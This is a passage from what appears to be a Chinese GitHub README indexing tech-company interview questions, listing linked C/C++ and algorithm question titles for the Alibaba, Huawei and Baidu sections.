和大数据之间数据实时流动的数据流及处理的系统,你会考虑哪些问题?如何设计?](01.阿里篇/1.3.4%20%E5%A6%82%E6%9E%9C%E8%AE%A9%E4%BD%A0%E6%9D%A5%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E6%94%AF%E6%8C%81%E6%95%B0%E6%8D%AE%E5%BA%93%E3%80%81NOSQL%20%E5%92%8C%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B9%8B%E9%97%B4%E6%95%B0%E6%8D%AE%E5%AE%9E%E6%97%B6%E6%B5%81%E5%8A%A8%E7%9A%84%E6%95%B0%E6%8D%AE%E6%B5%81%E5%8F%8A%E5%A4%84%E7%90%86%E7%9A%84%E7%B3%BB%E7%BB%9F%EF%BC%8C%E4%BD%A0%E4%BC%9A%E8%80%83%E8%99%91%E5%93%AA%E4%BA%9B%E9%97%AE%E9%A2%98%EF%BC%9F%E5%A6%82%E4%BD%95%E8%AE%BE%E8%AE%A1%EF%BC%9F.md) ##### [1.3.5 给定一个整数数组和一个整数,返回两个数组的索引,这两个索引指向的数字的加和等于指定的整数。需要最优的算法,分析算法的空间和时间复杂度](01.阿里篇/1.3.5%20%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0%E6%95%B0%E7%BB%84%E5%92%8C%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0%EF%BC%8C%E8%BF%94%E5%9B%9E%E4%B8%A4%E4%B8%AA%E6%95%B0%E7%BB%84%E7%9A%84%E7%B4%A2%E5%BC%95%EF%BC%8C%E8%BF%99%E4%B8%A4%E4%B8%AA%E7%B4%A2%E5%BC%95%E6%8C%87%E5%90%91%E7%9A%84%E6%95%B0%E5%AD%97%E7%9A%84%E5%8A%A0%E5%92%8C%E7%AD%89%E4%BA%8E%E6%8C%87%E5%AE%9A%E7%9A%84%E6%95%B4%E6%95%B0%E3%80%82%E9%9C%80%E8%A6%81%E6%9C%80%E4%BC%98%E7%9A%84%E7%AE%97%E6%B3%95%EF%BC%8C%E5%88%86%E6%9E%90%E7%AE%97%E6%B3%95%E7%9A%84%E7%A9%BA%E9%97%B4%E5%92%8C%E6%97%B6%E9%97%B4%E5%A4%8D%E6%9D%82%E5%BA%A6.md) ##### [1.3.6 假如给你一个新产品,你将从哪些方面来保障它的质量?](01.阿里篇/1.3.6%20%E5%81%87%E5%A6%82%E7%BB%99%E4%BD%A0%E4%B8%80%E4%B8%AA%E6%96%B0%E4%BA%A7%E5%93%81%EF%BC%8C%E4%BD%A0%E5%B0%86%E4%BB%8E%E5%93%AA%E4%BA%9B%E6%96%B9%E9%9D%A2%E6%9D%A5%E4%BF%9D%E9%9A%9C%E5%AE%83%E7%9A%84%E8%B4%A8%E9%87%8F%EF%BC%9F.md) ##### [1.3.7 请评估一下程序的执行结果?](01.阿里篇/1.3.7%20%E8%AF%B7%E8%AF%84%E4%BC%B0%E4%B8%80%E4%B8%8B%E7%A8%8B%E5%BA%8F%E7%9A%84%E6%89%A7%E8%A1%8C%E7%BB%93%E6%9E%9C%EF%BC%9F.md) <br> <h3 id="2">华为篇</h3> --- ##### [2.1.0 static有什么用途?(请至少说明两种)](https://github.com/0voice/interview_internal_reference/blob/master/02.%E5%8D%8E%E4%B8%BA%E7%AF%87/2.1.1%20static%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94%EF%BC%9F%EF%BC%88%E8%AF%B7%E8%87%B3%E5%B0%91%E8%AF%B4%E6%98%8E%E4%B8%A4%E7%A7%8D%EF%BC%89.md) ##### [2.1.1 变量的声明和定义有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#1%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.1.2 sizeof 和 strlen 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#3sizeof-%E5%92%8C-strlen-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.1.3 C 语言的关键字 static 和 C++ 的关键字 static 有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#4c-%E8%AF%AD%E8%A8%80%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97-static-%E5%92%8C-c-%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97-static-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.1.4 C中的 malloc 和C++中的 new 有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#5%EF%BD%83%E4%B8%AD%E7%9A%84-malloc-%E5%92%8C%EF%BD%83%E4%B8%AD%E7%9A%84-new-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.1.5 写一个“标准”宏 MIN](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#6%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8F-min) ##### [2.1.6 一个指针可以是 volatile 吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#7%E4%B8%80%E4%B8%AA%E6%8C%87%E9%92%88%E5%8F%AF%E4%BB%A5%E6%98%AF-volatile-%E5%90%97) ##### [2.1.7 a 和&a 有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#8a-%E5%92%8Ca-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.1.8 简述 C、C++程序编译的内存分配情况](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#9%E7%AE%80%E8%BF%B0-cc%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%83%85%E5%86%B5) ##### [2.1.9 简述 strcpy、sprintf 与 memcpy 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#10%E7%AE%80%E8%BF%B0-strcpysprintf-%E4%B8%8E-memcpy-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.2.0 设置地址为 0x67a9 的整型变量的值为 0xaa66](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#11%E8%AE%BE%E7%BD%AE%E5%9C%B0%E5%9D%80%E4%B8%BA-0x67a9-%E7%9A%84%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8F%E7%9A%84%E5%80%BC%E4%B8%BA-0xaa66) ##### [2.2.1 面向对象的三大特征](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#12%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E4%B8%89%E5%A4%A7%E7%89%B9%E5%BE%81) ##### [2.2.2 C++的空类有哪些成员函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#13c%E7%9A%84%E7%A9%BA%E7%B1%BB%E6%9C%89%E5%93%AA%E4%BA%9B%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0) ##### [2.2.3 谈谈你对拷贝构造函数和赋值运算符的认识](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#14%E8%B0%88%E8%B0%88%E4%BD%A0%E5%AF%B9%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E8%B5%8B%E5%80%BC%E8%BF%90%E7%AE%97%E7%AC%A6%E7%9A%84%E8%AE%A4%E8%AF%86) ##### [2.2.4 用 C++设计一个不能被继承的类](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#15%E7%94%A8-c%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E4%B8%8D%E8%83%BD%E8%A2%AB%E7%BB%A7%E6%89%BF%E7%9A%84%E7%B1%BB) ##### [2.2.5 访问基类的私有虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#16%E8%AE%BF%E9%97%AE%E5%9F%BA%E7%B1%BB%E7%9A%84%E7%A7%81%E6%9C%89%E8%99%9A%E5%87%BD%E6%95%B0) ##### [2.2.6 简述类成员函数的重写、重载和隐藏的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#17%E7%AE%80%E8%BF%B0%E7%B1%BB%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E7%9A%84%E9%87%8D%E5%86%99%E9%87%8D%E8%BD%BD%E5%92%8C%E9%9A%90%E8%97%8F%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.2.7 简述多态实现的原理](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#18%E7%AE%80%E8%BF%B0%E5%A4%9A%E6%80%81%E5%AE%9E%E7%8E%B0%E7%9A%84%E5%8E%9F%E7%90%86) ##### [2.2.8 链表和数组有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#19%E9%93%BE%E8%A1%A8%E5%92%8C%E6%95%B0%E7%BB%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.2.9 怎样把一个单链表反序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#20%E6%80%8E%E6%A0%B7%E6%8A%8A%E4%B8%80%E4%B8%AA%E5%8D%95%E9%93%BE%E8%A1%A8%E5%8F%8D%E5%BA%8F) ##### [2.3.0 简述队列和栈的异同](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#21%E7%AE%80%E8%BF%B0%E9%98%9F%E5%88%97%E5%92%8C%E6%A0%88%E7%9A%84%E5%BC%82%E5%90%8C) ##### [2.3.1 能否用两个栈实现一个队列的功能](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#22%E8%83%BD%E5%90%A6%E7%94%A8%E4%B8%A4%E4%B8%AA%E6%A0%88%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E9%98%9F%E5%88%97%E7%9A%84%E5%8A%9F%E8%83%BD) ##### [2.3.2 计算一颗二叉树的深度](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#23%E8%AE%A1%E7%AE%97%E4%B8%80%E9%A2%97%E4%BA%8C%E5%8F%89%E6%A0%91%E7%9A%84%E6%B7%B1%E5%BA%A6) ##### [2.3.3 编码实现直接插入排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#24%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E7%9B%B4%E6%8E%A5%E6%8F%92%E5%85%A5%E6%8E%92%E5%BA%8F) ##### [2.3.4 编码实现冒泡排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#25%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E5%86%92%E6%B3%A1%E6%8E%92%E5%BA%8F) ##### [2.3.5 编码实现直接选择排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#26%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E7%9B%B4%E6%8E%A5%E9%80%89%E6%8B%A9%E6%8E%92%E5%BA%8F) ##### [2.3.6 编程实现堆排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#27%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E5%A0%86%E6%8E%92%E5%BA%8F) ##### [2.3.7 编程实现基数排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#28%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E5%9F%BA%E6%95%B0%E6%8E%92%E5%BA%8F) ##### [2.3.8 谈谈你对编程规范的理解或认识](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#29%E8%B0%88%E8%B0%88%E4%BD%A0%E5%AF%B9%E7%BC%96%E7%A8%8B%E8%A7%84%E8%8C%83%E7%9A%84%E7%90%86%E8%A7%A3%E6%88%96%E8%AE%A4%E8%AF%86) ##### [2.3.9 short i = 0; i = i + 1L;这两句有错吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#30short-i--0-i--i--1l%E8%BF%99%E4%B8%A4%E5%8F%A5%E6%9C%89%E9%94%99%E5%90%97) ##### [2.4.0 &&和&、||和|有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#31%E5%92%8C%E5%92%8C%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.4.1 C++的引用和 C 语言的指针有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#32c%E7%9A%84%E5%BC%95%E7%94%A8%E5%92%8C-c-%E8%AF%AD%E8%A8%80%E7%9A%84%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.4.2 在二元树中找出和为某一值的所有路径](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#33%E5%9C%A8%E4%BA%8C%E5%85%83%E6%A0%91%E4%B8%AD%E6%89%BE%E5%87%BA%E5%92%8C%E4%B8%BA%E6%9F%90%E4%B8%80%E5%80%BC%E7%9A%84%E6%89%80%E6%9C%89%E8%B7%AF%E5%BE%84) ##### [2.4.3 typedef 和 define 有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#35typedef-%E5%92%8C-define-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [2.4.4 关键字 const 是什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#36%E5%85%B3%E9%94%AE%E5%AD%97-const-%E6%98%AF%E4%BB%80%E4%B9%88) ##### [2.4.5 static 有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#37static-%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [2.4.6 extern 有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#38extern-%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [2.4.7 流操作符重载为什么返回引用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#39%E6%B5%81%E6%93%8D%E4%BD%9C%E7%AC%A6%E9%87%8D%E8%BD%BD%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%94%E5%9B%9E%E5%BC%95%E7%94%A8) ##### [2.4.8 简述指针常量与常量指针区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#40%E7%AE%80%E8%BF%B0%E6%8C%87%E9%92%88%E5%B8%B8%E9%87%8F%E4%B8%8E%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E5%8C%BA%E5%88%AB) ##### [2.4.9 数组名和指针的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#41%E6%95%B0%E7%BB%84%E5%90%8D%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.5.0 如何避免“野指针”](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#42%E5%A6%82%E4%BD%95%E9%81%BF%E5%85%8D%E9%87%8E%E6%8C%87%E9%92%88) ##### [2.5.1 常引用有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#43%E5%B8%B8%E5%BC%95%E7%94%A8%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [2.5.2 编码实现字符串转化为数字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#44%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BD%AC%E5%8C%96%E4%B8%BA%E6%95%B0%E5%AD%97) ##### [2.5.3 简述 strcpy、sprintf 与 memcpy 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#45%E7%AE%80%E8%BF%B0-strcpysprintf-%E4%B8%8E-memcpy-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [2.5.4 用 C 编写一个死循环程序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#46%E7%94%A8-c-%E7%BC%96%E5%86%99%E4%B8%80%E4%B8%AA%E6%AD%BB%E5%BE%AA%E7%8E%AF%E7%A8%8B%E5%BA%8F) ##### [2.5.5 编码实现某一变量某位清 0 或置 1](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#47%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E6%9F%90%E4%B8%80%E5%8F%98%E9%87%8F%E6%9F%90%E4%BD%8D%E6%B8%85-0-%E6%88%96%E7%BD%AE-1) ##### [2.5.6 评论下面这个中断函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#48%E8%AF%84%E8%AE%BA%E4%B8%8B%E9%9D%A2%E8%BF%99%E4%B8%AA%E4%B8%AD%E6%96%AD%E5%87%BD%E6%95%B0) ##### [2.5.7 构造函数能否为虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#49%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%83%BD%E5%90%A6%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [2.5.8 谈谈你对面向对象的认识](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#50%E8%B0%88%E8%B0%88%E4%BD%A0%E5%AF%B9%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E8%AE%A4%E8%AF%86) ##### [2.5.9 动态库和静态库的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#67%E5%8A%A8%E6%80%81%E5%BA%93%E5%92%8C%E9%9D%99%E6%80%81%E5%BA%93%E7%9A%84%E5%8C%BA%E5%88%AB) <br> <h3 id="3">百度篇</h3> --- ##### [3.1.0 提高c++性能,你用过哪些方式去提升](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#68%E6%8F%90%E9%AB%98c%E6%80%A7%E8%83%BD%E4%BD%A0%E7%94%A8%E8%BF%87%E5%93%AA%E4%BA%9B%E6%96%B9%E5%BC%8F%E5%8E%BB%E6%8F%90%E5%8D%87) ##### [3.1.1 引用和指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#74%E5%BC%95%E7%94%A8%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [3.1.2 从汇编层去解释一下引用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#75%E4%BB%8E%E6%B1%87%E7%BC%96%E5%B1%82%E5%8E%BB%E8%A7%A3%E9%87%8A%E4%B8%80%E4%B8%8B%E5%BC%95%E7%94%A8) ##### [3.1.3 C++中的指针参数传递和引用参数传递](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#76c%E4%B8%AD%E7%9A%84%E6%8C%87%E9%92%88%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E5%92%8C%E5%BC%95%E7%94%A8%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92) ##### [3.1.4 形参与实参的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#77%E5%BD%A2%E5%8F%82%E4%B8%8E%E5%AE%9E%E5%8F%82%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [3.1.5 static的用法和作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#78static%E7%9A%84%E7%94%A8%E6%B3%95%E5%92%8C%E4%BD%9C%E7%94%A8) ##### [3.1.6 静态变量什么时候初始化](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#79%E9%9D%99%E6%80%81%E5%8F%98%E9%87%8F%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [3.1.7 const?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#80const) ##### [3.1.8 const成员函数的理解和应用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#81const%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E7%9A%84%E7%90%86%E8%A7%A3%E5%92%8C%E5%BA%94%E7%94%A8) ##### [3.1.9 指针和const的用法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#82%E6%8C%87%E9%92%88%E5%92%8Cconst%E7%9A%84%E7%94%A8%E6%B3%95) ##### [3.2.0 mutable](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#83mutable) ##### [3.2.1 extern用法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#84extern%E7%94%A8%E6%B3%95) ##### [3.2.2 int转字符串字符串转int?strcat,strcpy,strncpy,memset,memcpy的内部实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#85int%E8%BD%AC%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BD%ACintstrcatstrcpystrncpymemsetmemcpy%E7%9A%84%E5%86%85%E9%83%A8%E5%AE%9E%E7%8E%B0) ##### [3.2.3 深拷贝与浅拷贝?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#86%E6%B7%B1%E6%8B%B7%E8%B4%9D%E4%B8%8E%E6%B5%85%E6%8B%B7%E8%B4%9D) ##### [3.2.4 C++模板是什么,底层怎么实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#87c%E6%A8%A1%E6%9D%BF%E6%98%AF%E4%BB%80%E4%B9%88%E5%BA%95%E5%B1%82%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [3.2.5 C语言struct和C++struct区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#88c%E8%AF%AD%E8%A8%80struct%E5%92%8Ccstruct%E5%8C%BA%E5%88%AB) ##### [3.2.6 虚函数可以声明为inline吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#89%E8%99%9A%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E5%A3%B0%E6%98%8E%E4%B8%BAinline%E5%90%97) ##### [3.2.7 类成员初始化方式?构造函数的执行顺序 ?为什么用成员初始化列表会快一些?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#90%E7%B1%BB%E6%88%90%E5%91%98%E5%88%9D%E5%A7%8B%E5%8C%96%E6%96%B9%E5%BC%8F%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E9%A1%BA%E5%BA%8F-%E4%B8%BA%E4%BB%80%E4%B9%88%E7%94%A8%E6%88%90%E5%91%98%E5%88%9D%E5%A7%8B%E5%8C%96%E5%88%97%E8%A1%A8%E4%BC%9A%E5%BF%AB%E4%B8%80%E4%BA%9B) ##### [3.2.8 成员列表初始化?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#91%E6%88%90%E5%91%98%E5%88%97%E8%A1%A8%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [3.2.9 构造函数为什么不能为虚函数?析构函数为什么要虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#92%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E8%83%BD%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E8%99%9A%E5%87%BD%E6%95%B0) ##### [3.3.0 析构函数的作用,如何起作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#93%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8%E5%A6%82%E4%BD%95%E8%B5%B7%E4%BD%9C%E7%94%A8) ##### [3.3.1 构造函数和析构函数可以调用虚函数吗,为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#94%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E8%B0%83%E7%94%A8%E8%99%9A%E5%87%BD%E6%95%B0%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [3.3.2 构造函数的执行顺序?析构函数的执行顺序?构造函数内部干了啥?拷贝构造干了啥?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#95%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E9%A1%BA%E5%BA%8F%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E9%A1%BA%E5%BA%8F%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%86%85%E9%83%A8%E5%B9%B2%E4%BA%86%E5%95%A5%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%B9%B2%E4%BA%86%E5%95%A5) ##### [3.3.3 虚析构函数的作用,父类的析构函数是否要设置为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#96%E8%99%9A%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8%E7%88%B6%E7%B1%BB%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E6%98%AF%E5%90%A6%E8%A6%81%E8%AE%BE%E7%BD%AE%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [3.3.4 构造函数析构函数可否抛出异常](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#97%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%8F%AF%E5%90%A6%E6%8A%9B%E5%87%BA%E5%BC%82%E5%B8%B8) ##### [3.3.5 类如何实现只能静态分配和只能动态分配](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#98%E7%B1%BB%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%8F%AA%E8%83%BD%E9%9D%99%E6%80%81%E5%88%86%E9%85%8D%E5%92%8C%E5%8F%AA%E8%83%BD%E5%8A%A8%E6%80%81%E5%88%86%E9%85%8D) ##### [3.3.6 如果想将某个类用作基类,为什么该类必须定义而非声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#99%E5%A6%82%E6%9E%9C%E6%83%B3%E5%B0%86%E6%9F%90%E4%B8%AA%E7%B1%BB%E7%94%A8%E4%BD%9C%E5%9F%BA%E7%B1%BB%E4%B8%BA%E4%BB%80%E4%B9%88%E8%AF%A5%E7%B1%BB%E5%BF%85%E9%A1%BB%E5%AE%9A%E4%B9%89%E8%80%8C%E9%9D%9E%E5%A3%B0%E6%98%8E) ##### [3.3.7 什么情况会自动生成默认构造函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#100%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E4%BC%9A%E8%87%AA%E5%8A%A8%E7%94%9F%E6%88%90%E9%BB%98%E8%AE%A4%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [3.3.8 什么是类的继承?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#101%E4%BB%80%E4%B9%88%E6%98%AF%E7%B1%BB%E7%9A%84%E7%BB%A7%E6%89%BF) ##### [3.3.9 什么是组合?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#102%E4%BB%80%E4%B9%88%E6%98%AF%E7%BB%84%E5%90%88) ##### [3.4.0 抽象基类为什么不能创建对象?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#103%E6%8A%BD%E8%B1%A1%E5%9F%BA%E7%B1%BB%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E8%83%BD%E5%88%9B%E5%BB%BA%E5%AF%B9%E8%B1%A1) ##### [3.4.1 类什么时候会析构?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#104%E7%B1%BB%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E4%BC%9A%E6%9E%90%E6%9E%84) ##### [3.4.2 为什么友元函数必须在类内部声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#105%E4%B8%BA%E4%BB%80%E4%B9%88%E5%8F%8B%E5%85%83%E5%87%BD%E6%95%B0%E5%BF%85%E9%A1%BB%E5%9C%A8%E7%B1%BB%E5%86%85%E9%83%A8%E5%A3%B0%E6%98%8E) ##### [3.4.3 介绍一下C++里面的多态?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#106%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8Bc%E9%87%8C%E9%9D%A2%E7%9A%84%E5%A4%9A%E6%80%81) ##### [3.4.4 用C语言实现C++的继承](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#107%E7%94%A8c%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0c%E7%9A%84%E7%BB%A7%E6%89%BF) ##### [3.4.5 继承机制中对象之间如何转换?指针和引用之间如何转换?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#108%E7%BB%A7%E6%89%BF%E6%9C%BA%E5%88%B6%E4%B8%AD%E5%AF%B9%E8%B1%A1%E4%B9%8B%E9%97%B4%E5%A6%82%E4%BD%95%E8%BD%AC%E6%8D%A2%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E4%B9%8B%E9%97%B4%E5%A6%82%E4%BD%95%E8%BD%AC%E6%8D%A2) ##### [3.4.6 组合与继承优缺点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#109%E7%BB%84%E5%90%88%E4%B8%8E%E7%BB%A7%E6%89%BF%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [3.4.7 左值右值](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#110%E5%B7%A6%E5%80%BC%E5%8F%B3%E5%80%BC) ##### [3.4.8 